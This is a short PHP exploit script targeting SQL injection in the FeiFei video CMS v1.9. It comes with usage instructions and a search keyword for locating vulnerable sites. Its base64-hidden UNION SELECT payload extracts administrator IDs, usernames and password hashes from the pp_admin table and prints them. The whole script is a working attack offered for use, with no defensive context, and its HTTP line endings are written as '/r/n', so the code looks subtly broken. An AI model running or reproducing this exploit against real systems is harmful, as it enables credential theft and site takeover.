<?php
/**
* 飞飞影视管理系统 SQL injection
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans
* keyword "Powered by www.ff84.com"
*/ error_reporting(E_ERROR); set_time_limit(0); if ($argc<3) { print_r('
------------------------------------------------------
Usage: php '.$argv[0].'
host path host:
target server (ip/hostname),without"http://"
path:path to ff84cms
Example:
php '.$argv[0].' localhost /
-------------------------------------------------------
');
die; } $host=$argv[1]; $path=$argv[2]; $html=''; $cookie=""; $agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"; $content=""; $data= "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1/r/n"; $data.= "Host: ".$host."/r/n"; //$data .="Cookie: ".$cookie."/r/n"; $data.= "User-Agent: ".$agent. "/r/n"; $data.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r/n"; $data.= "Accept-Language: zh-cn,zh;q=0.5/r/n"; $data.= "Accept-Encoding: gzip,deflate/r/n";$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7/r/n"; $data.= "Connection: keep-alive/r/n"; $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; $data.= "Content-Length: ".strlen($content)."/r/n/r/n"; $data.= $content."/r/n"; Sendpack($data); if (!eregi("Tpl",$html)){ // echo $packet."/r/n"; // echo $html."/r/n"; die("Exploit failed..."); }else{ $pattern="/@(.*)@/i"; preg_match($pattern,$html,$pg); echo"$pg[1]/r/n/r/n"; echo"/r/nExploit succeeded.../r/n"; } Function sendpack ($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }
评论